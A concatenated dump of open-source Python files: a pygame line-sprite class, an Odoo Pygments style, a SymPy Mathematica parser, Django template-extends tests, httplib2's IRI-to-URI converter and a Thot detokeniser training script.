for line in self.lines[:]:
if line.points()[0] == point or line.points()[1] == point:
line.kill()
self.lines.remove(line)
class Line(pygame.sprite.DirtySprite):
def __init__(self, pos1, pos2):
pygame.sprite.DirtySprite.__init__(self)
if pos1[1] > pos2[1]:
temp = pos1
pos1 = pos2
pos2 = temp
self.line_seg = Line_Segment(pos1,pos2)
#vertical line
if pos1[0] == pos2[0]:
self.image = pygame.Surface( (3, abs(self.line_seg.y_length())) )
self.image.fill( [125,125,125] )
self.rect = self.image.get_rect()
pygame.draw.line(self.image, [0,0,175],
(1,0),
(1, self.rect.bottom), 3)
pygame.draw.line(self.image, [0,255,255],
(1,0),
(1, self.rect.bottom), 1)
self.rect.left = min(pos1[0], pos2[0])
self.rect.top = pos1[1] - 1
#horizontal line
elif pos1[1] == pos2[1]:
self.image = pygame.Surface( (abs(self.line_seg.x_length()), 5 ) )
self.image.fill( [125,125,125] )
self.rect = self.image.get_rect()
pygame.draw.line(self.image, [0,0,175],
(0,1),
(self.rect.right, 1), 3)
pygame.draw.line(self.image, [0,255,255],
(0,1),
(self.rect.right, 1), 1)
self.rect.left = pos1[0] - 1
self.rect.top = min(pos1[1], pos2[1])
else:
self.image = pygame.Surface( (abs(self.line_seg.x_length()), abs(self.line_seg.y_length())) )
self.image.fill( [125,125,125] )
self.rect = self.image.get_rect()
if pos1[0] < pos2[0]:
pygame.draw.line(self.image, [0,0,175],
(0,0),
(self.rect.right, self.rect.bottom), 4)
pygame.draw.line(self.image, [0,255,255],
(0,0),
(self.rect.right, self.rect.bottom), 2)
self.rect.top = pos1[1]
self.rect.left = pos1[0]
else:
pygame.draw.line(self.image, [0,0,175],
(self.rect.right,0),
(0, self.rect.bottom), 4)
pygame.draw.line(self.image, [0,255,255],
(self.rect.right,0),
(0, self.rect.bottom), 2)
self.rect.top = pos1[1]
self.rect.left = pos2[0]
self.image.set_colorkey( [125,125,125] )
self.dirty = 1
def points(self):
return self.line_seg.points()
def hit(self, pos, vector):
"""
--> tuple
Returns the position and reflection vector as a tuple (pos, vector),
or if there is no unique point of intersection returns None
pos(tuple) --> The origin of the object before movement
vector(Vector) --> The movement vector of the object
"""
return self.line_seg.hit(pos, vector)
if __name__ == "__main__":
from math import degrees
x = Line( (0,0), (4.6025242672622015, 1.9536556424463689) )
yx = Vector()
yx.from_points( (0,0), (4.6025242672622015, 1.9536556424463689) )
print degrees(yx.get_angle())
y = Vector()
y.from_points( (- 2,-2 ), (.5881904510252074,7.6592582628906829) )
print degrees(y.get_angle())
print "expected 331"
print degrees(x.hit( (0,-2), y )[1].get_angle())
| mit |
collex100/odoo | doc/_themes/odoodoc/odoo_pygments.py | 129 | 1723 | # -*- coding: utf-8 -*-
import imp
import sys
from pygments.style import Style
from pygments.token import *
# extracted from getbootstrap.com
class OdooStyle(Style):
background_color = '#ffffcc'
highlight_color = '#fcf8e3'
styles = {
Whitespace: '#BBB',
Error: 'bg:#FAA #A00',
Keyword: '#069',
Keyword.Type: '#078',
Name.Attribute: '#4F9FCF',
Name.Builtin: '#366',
Name.Class: '#0A8',
Name.Constant: '#360',
Name.Decorator: '#99F',
Name.Entity: '#999',
Name.Exception: '#C00',
Name.Function: '#C0F',
Name.Label: '#99F',
Name.Namespace: '#0CF',
Name.Tag: '#2F6F9F',
Name.Variable: '#033',
String: '#d44950',
String.Backtick: '#C30',
String.Char: '#C30',
String.Doc: 'italic #C30',
String.Double: '#C30',
String.Escape: '#C30',
String.Heredoc: '#C30',
String.Interol: '#C30',
String.Other: '#C30',
String.Regex: '#3AA',
String.Single: '#C30',
String.Symbol: '#FC3',
Number: '#F60',
Operator: '#555',
Operator.Word: '#000',
Comment: '#999',
Comment.Preproc: '#099',
Generic.Deleted: 'bg:#FCC border:#c00',
Generic.Emph: 'italic',
Generic.Error: '#F00',
Generic.Heading: '#030',
Generic.Inserted: 'bg:#CFC border:#0C0',
Generic.Output: '#AAA',
Generic.Prompt: '#009',
Generic.Strong: '',
Generic.Subheading: '#030',
Generic.Traceback: '#9C6',
}
modname = 'pygments.styles.odoo'
m = imp.new_module(modname)
m.OdooStyle = OdooStyle
sys.modules[modname] = m
| agpl-3.0 |
NikNitro/Python-iBeacon-Scan | sympy/parsing/mathematica.py | 96 | 1996 | from __future__ import print_function, division
from re import match
from sympy import sympify
def mathematica(s):
return sympify(parse(s))
def parse(s):
s = s.strip()
# Begin rules
rules = (
# Arithmetic operation between a constant and a function
(r"\A(\d+)([*/+-^])(\w+\[[^\]]+[^\[]*\])\Z",
lambda m: m.group(
1) + translateFunction(m.group(2)) + parse(m.group(3))),
# Arithmetic operation between two functions
(r"\A(\w+\[[^\]]+[^\[]*\])([*/+-^])(\w+\[[^\]]+[^\[]*\])\Z",
lambda m: parse(m.group(1)) + translateFunction(
m.group(2)) + parse(m.group(3))),
(r"\A(\w+)\[([^\]]+[^\[]*)\]\Z", # Function call
lambda m: translateFunction(
m.group(1)) + "(" + parse(m.group(2)) + ")"),
(r"\((.+)\)\((.+)\)", # Parenthesized implied multiplication
lambda m: "(" + parse(m.group(1)) + ")*(" + parse(m.group(2)) + ")"),
(r"\A\((.+)\)\Z", # Parenthesized expression
lambda m: "(" + parse(m.group(1)) + ")"),
(r"\A(.*[\w\.])\((.+)\)\Z", # Implied multiplication - a(b)
lambda m: parse(m.group(1)) + "*(" + parse(m.group(2)) + ")"),
(r"\A\((.+)\)([\w\.].*)\Z", # Implied multiplication - (a)b
lambda m: "(" + parse(m.group(1)) + ")*" + parse(m.group(2))),
(r"\A(-? *[\d\.]+)([a-zA-Z].*)\Z", # Implied multiplication - 2a
lambda m: parse(m.group(1)) + "*" + parse(m.group(2))),
(r"\A([^=]+)([\^\-\*/\+=]=?)(.+)\Z", # Infix operator
lambda m: parse(m.group(1)) + translateOperator(m.group(2)) + parse(m.group(3))))
# End rules
for rule, action in rules:
m = match(rule, s)
if m:
return action(m)
return s
def translateFunction(s):
if s.startswith("Arc"):
return "a" + s[3:]
return s.lower()
def translateOperator(s):
dictionary = {'^': '**'}
if s in dictionary:
return dictionary[s]
return s
| gpl-3.0 |
reinout/django | tests/template_tests/test_extends.py | 87 | 5759 | import os
from django.template import Context, Engine, TemplateDoesNotExist
from django.test import SimpleTestCase
from .utils import ROOT
RECURSIVE = os.path.join(ROOT, 'recursive_templates')
class ExtendsBehaviorTests(SimpleTestCase):
def test_normal_extend(self):
engine = Engine(dirs=[os.path.join(RECURSIVE, 'fs')])
template = engine.get_template('one.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'three two one')
def test_extend_recursive(self):
engine = Engine(dirs=[
os.path.join(RECURSIVE, 'fs'),
os.path.join(RECURSIVE, 'fs2'),
os.path.join(RECURSIVE, 'fs3'),
])
template = engine.get_template('recursive.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'fs3/recursive fs2/recursive fs/recursive')
def test_extend_missing(self):
engine = Engine(dirs=[os.path.join(RECURSIVE, 'fs')])
template = engine.get_template('extend-missing.html')
with self.assertRaises(TemplateDoesNotExist) as e:
template.render(Context({}))
tried = e.exception.tried
self.assertEqual(len(tried), 1)
self.assertEqual(tried[0][0].template_name, 'missing.html')
def test_recursive_multiple_loaders(self):
engine = Engine(
dirs=[os.path.join(RECURSIVE, 'fs')],
loaders=[(
'django.template.loaders.locmem.Loader', {
'one.html': (
'{% extends "one.html" %}{% block content %}{{ block.super }} locmem-one{% endblock %}'
),
'two.html': (
'{% extends "two.html" %}{% block content %}{{ block.super }} locmem-two{% endblock %}'
),
'three.html': (
'{% extends "three.html" %}{% block content %}{{ block.super }} locmem-three{% endblock %}'
),
}
), 'django.template.loaders.filesystem.Loader'],
)
template = engine.get_template('one.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'three locmem-three two locmem-two one locmem-one')
def test_extend_self_error(self):
"""
Catch if a template extends itself and no other matching
templates are found.
"""
engine = Engine(dirs=[os.path.join(RECURSIVE, 'fs')])
template = engine.get_template('self.html')
with self.assertRaises(TemplateDoesNotExist):
template.render(Context({}))
def test_extend_cached(self):
engine = Engine(
dirs=[
os.path.join(RECURSIVE, 'fs'),
os.path.join(RECURSIVE, 'fs2'),
os.path.join(RECURSIVE, 'fs3'),
],
loaders=[
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
]),
],
)
template = engine.get_template('recursive.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'fs3/recursive fs2/recursive fs/recursive')
cache = engine.template_loaders[0].get_template_cache
self.assertEqual(len(cache), 3)
expected_path = os.path.join('fs', 'recursive.html')
self.assertTrue(cache['recursive.html'].origin.name.endswith(expected_path))
# Render another path that uses the same templates from the cache
template = engine.get_template('other-recursive.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'fs3/recursive fs2/recursive fs/recursive')
# Template objects should not be duplicated.
self.assertEqual(len(cache), 4)
expected_path = os.path.join('fs', 'other-recursive.html')
self.assertTrue(cache['other-recursive.html'].origin.name.endswith(expected_path))
def test_unique_history_per_loader(self):
"""
Extending should continue even if two loaders return the same
name for a template.
"""
engine = Engine(
loaders=[
['django.template.loaders.locmem.Loader', {
'base.html': '{% extends "base.html" %}{% block content %}{{ block.super }} loader1{% endblock %}',
}],
['django.template.loaders.locmem.Loader', {
'base.html': '{% block content %}loader2{% endblock %}',
}],
]
)
template = engine.get_template('base.html')
output = template.render(Context({}))
self.assertEqual(output.strip(), 'loader2 loader1')
def test_block_override_in_extended_included_template(self):
"""
ExtendsNode.find_template() initializes history with self.origin
(#28071).
"""
engine = Engine(
loaders=[
['django.template.loaders.locmem.Loader', {
'base.html': "{% extends 'base.html' %}{% block base %}{{ block.super }}2{% endblock %}",
'included.html':
"{% extends 'included.html' %}{% block included %}{{ block.super }}B{% endblock %}",
}],
['django.template.loaders.locmem.Loader', {
'base.html': "{% block base %}1{% endblock %}{% include 'included.html' %}",
'included.html': "{% block included %}A{% endblock %}",
}],
],
)
template = engine.get_template('base.html')
self.assertEqual(template.render(Context({})), '12AB')
| bsd-3-clause |
samuelkordik/pocketlib | httplib2/iri2uri.py | 706 | 3828 | """
iri2uri
Converts an IRI to a URI.
"""
__author__ = "Joe Gregorio (joe@bitworking.org)"
__copyright__ = "Copyright 2006, Joe Gregorio"
__contributors__ = []
__version__ = "1.0.0"
__license__ = "MIT"
__history__ = """
"""
import urlparse
# Convert an IRI to a URI following the rules in RFC 3987
#
# The characters we need to enocde and escape are defined in the spec:
#
# iprivate = %xE000-F8FF / %xF0000-FFFFD / %x100000-10FFFD
# ucschar = %xA0-D7FF / %xF900-FDCF / %xFDF0-FFEF
# / %x10000-1FFFD / %x20000-2FFFD / %x30000-3FFFD
# / %x40000-4FFFD / %x50000-5FFFD / %x60000-6FFFD
# / %x70000-7FFFD / %x80000-8FFFD / %x90000-9FFFD
# / %xA0000-AFFFD / %xB0000-BFFFD / %xC0000-CFFFD
# / %xD0000-DFFFD / %xE1000-EFFFD
escape_range = [
(0xA0, 0xD7FF),
(0xE000, 0xF8FF),
(0xF900, 0xFDCF),
(0xFDF0, 0xFFEF),
(0x10000, 0x1FFFD),
(0x20000, 0x2FFFD),
(0x30000, 0x3FFFD),
(0x40000, 0x4FFFD),
(0x50000, 0x5FFFD),
(0x60000, 0x6FFFD),
(0x70000, 0x7FFFD),
(0x80000, 0x8FFFD),
(0x90000, 0x9FFFD),
(0xA0000, 0xAFFFD),
(0xB0000, 0xBFFFD),
(0xC0000, 0xCFFFD),
(0xD0000, 0xDFFFD),
(0xE1000, 0xEFFFD),
(0xF0000, 0xFFFFD),
(0x100000, 0x10FFFD),
]
def encode(c):
retval = c
i = ord(c)
for low, high in escape_range:
if i < low:
break
if i >= low and i <= high:
retval = "".join(["%%%2X" % ord(o) for o in c.encode('utf-8')])
break
return retval
def iri2uri(uri):
"""Convert an IRI to a URI. Note that IRIs must be
passed in a unicode strings. That is, do not utf-8 encode
the IRI before passing it into the function."""
if isinstance(uri ,unicode):
(scheme, authority, path, query, fragment) = urlparse.urlsplit(uri)
authority = authority.encode('idna')
# For each character in 'ucschar' or 'iprivate'
# 1. encode as utf-8
# 2. then %-encode each octet of that utf-8
uri = urlparse.urlunsplit((scheme, authority, path, query, fragment))
uri = "".join([encode(c) for c in uri])
return uri
if __name__ == "__main__":
import unittest
class Test(unittest.TestCase):
def test_uris(self):
"""Test that URIs are invariant under the transformation."""
invariant = [
u"ftp://ftp.is.co.za/rfc/rfc1808.txt",
u"http://www.ietf.org/rfc/rfc2396.txt",
u"ldap://[2001:db8::7]/c=GB?objectClass?one",
u"mailto:John.Doe@example.com",
u"news:comp.infosystems.www.servers.unix",
u"tel:+1-816-555-1212",
u"telnet://192.0.2.16:80/",
u"urn:oasis:names:specification:docbook:dtd:xml:4.1.2" ]
for uri in invariant:
self.assertEqual(uri, iri2uri(uri))
def test_iri(self):
""" Test that the right type of escaping is done for each part of the URI."""
self.assertEqual("http://xn--o3h.com/%E2%98%84", iri2uri(u"http://\N{COMET}.com/\N{COMET}"))
self.assertEqual("http://bitworking.org/?fred=%E2%98%84", iri2uri(u"http://bitworking.org/?fred=\N{COMET}"))
self.assertEqual("http://bitworking.org/#%E2%98%84", iri2uri(u"http://bitworking.org/#\N{COMET}"))
self.assertEqual("#%E2%98%84", iri2uri(u"#\N{COMET}"))
self.assertEqual("/fred?bar=%E2%98%9A#%E2%98%84", iri2uri(u"/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}"))
self.assertEqual("/fred?bar=%E2%98%9A#%E2%98%84", iri2uri(iri2uri(u"/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}")))
self.assertNotEqual("/fred?bar=%E2%98%9A#%E2%98%84", iri2uri(u"/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}".encode('utf-8')))
unittest.main()
| mit |
daormar/thot | utils/smt_preproc/thot_train_detok_model.py | 1 | 3815 | # Author: Daniel Ortiz Mart\'inez
# *- python -*
# import modules
import io, sys, getopt
import thot_smt_preproc as smtpr
##################################################
def print_help():
print >> sys.stderr, "thot_train_detok_model -r <string> [-t <string>] [-n <int>]"
print >> sys.stderr, " -o <string> [-v] [--help]"
print >> sys.stderr, ""
print >> sys.stderr, "-r <string> File with raw text in the language of interest"
print >> sys.stderr, "-t <string> File with tokenized version of the raw text using"
print >> sys.stderr, " an arbitrary tokenizer"
print >> sys.stderr, "-n <int> Order of n-grams for language model"
print >> sys.stderr, "-o <string> Prefix of output files"
print >> sys.stderr, "-v Verbose mode"
print >> sys.stderr, "--help Print this help message"
##################################################
def main(argv):
# take parameters
r_given=False
rfilename = ""
t_given=False
tfilename = ""
n_given=False
nval=3
o_given=False
opref= ""
verbose=False
try:
opts, args = getopt.getopt(sys.argv[1:],"hr:t:n:o:v",["help","rawfn=","tokfn=","nval=","opref="])
except getopt.GetoptError:
print_help()
sys.exit(2)
if(len(opts)==0):
print_help()
sys.exit()
else:
for opt, arg in opts:
if opt in ("-h", "--help"):
print_help()
sys.exit()
elif opt in ("-r", "--rawfn"):
rfilename = arg
r_given=True
elif opt in ("-t", "--tokfn"):
tfilename = arg
t_given=True
elif opt in ("-n", "--nval"):
nval = int(arg)
n_given=True
elif opt in ("-o", "--opref"):
opref = arg
o_given=True
elif opt in ("-v", "--verbose"):
verbose=True
# check parameters
if(r_given==False):
print >> sys.stderr, "Error! -r parameter not given"
sys.exit(2)
if(o_given==False):
print >> sys.stderr, "Error! -o parameter not given"
sys.exit(2)
# print parameters
if(r_given==True):
print >> sys.stderr, "r is %s" % (rfilename)
if(t_given==True):
print >> sys.stderr, "t is %s" % (tfilename)
if(n_given==True):
print >> sys.stderr, "n is %d" % (nval)
if(o_given==True):
print >> sys.stderr, "o is %s" % (opref)
# open files
if(r_given==True):
# open file
rfile = io.open(rfilename, 'r', encoding="utf-8")
if(t_given==True):
# open file
tfile = io.open(tfilename, 'r', encoding="utf-8")
# train translation model
print >> sys.stderr, "Training translation model..."
tmodel=smtpr.TransModel()
if(t_given==True):
tmodel.train_tok_tm_par_files(rfile,tfile,verbose)
else:
tmodel.train_tok_tm(rfile,verbose)
# print translation model
tmfile = io.open(opref+".tm", 'w', encoding='utf-8')
tmodel.print_model_to_file(tmfile)
# reopen files
rfile.close()
rfile = io.open(rfilename, 'r', encoding="utf-8")
if(t_given==True):
tfile.close()
tfile = io.open(tfilename, 'r', encoding="utf-8")
# train language model
print >> sys.stderr, "Training language model..."
lmodel=smtpr.LangModel()
if(t_given==True):
lmodel.train_tok_lm_par_files(rfile,tfile,nval,verbose)
else:
lmodel.train_tok_lm(rfile,nval,verbose)
# print language model
lmfile = io.open(opref+".lm", 'w', encoding='utf-8')
lmodel.print_model_to_file(lmfile)
if __name__ == "__main__":
# Call main function
main(sys.argv)
| lgpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.